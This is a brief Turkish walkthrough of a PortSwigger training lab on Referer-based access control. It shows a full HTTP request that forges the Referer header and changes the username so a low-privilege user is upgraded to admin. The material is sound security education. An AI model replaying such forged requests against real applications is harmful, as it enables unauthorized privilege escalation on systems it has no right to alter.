URI ; https://portswigger.net/web-security/access-control/lab-referer-based-access-control
Admin hesabıma girip carlos kullanıcısının yetkisini yükseltirken isteği yakalayıp Raw kısmını not ediyorum.
wiener kullanıcıma erişim sağlayıp Anasayfa da Burp ile istek atıyorum ve Repeater’a gönderiyorum.
Not ettiğim çıktıları göz önüne alarak yaptığım değişiklikler ;
GET /admin-roles?username=wiener&action=upgrade HTTP/1.1 //1.değişiklik
Host: acaf1f351e4bbb5280418abf005e0077.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acaf1f351e4bbb5280418abf005e0077.web-security-academy.net/admin //2.değişiklik
Connection: close
Cookie: session=mFfRw13Vz4smdiqmZaljWRchvuexJrrs
Upgrade-Insecure-Requests: 1
Send ve ardından Follow redirect dedikten sonra laboratuvar ortamınız çözülmüş olacak.
English
Arabic
Chinese (Simplified)
Dutch
French
German
Italian
Portuguese
Russian
Spanish
Turkish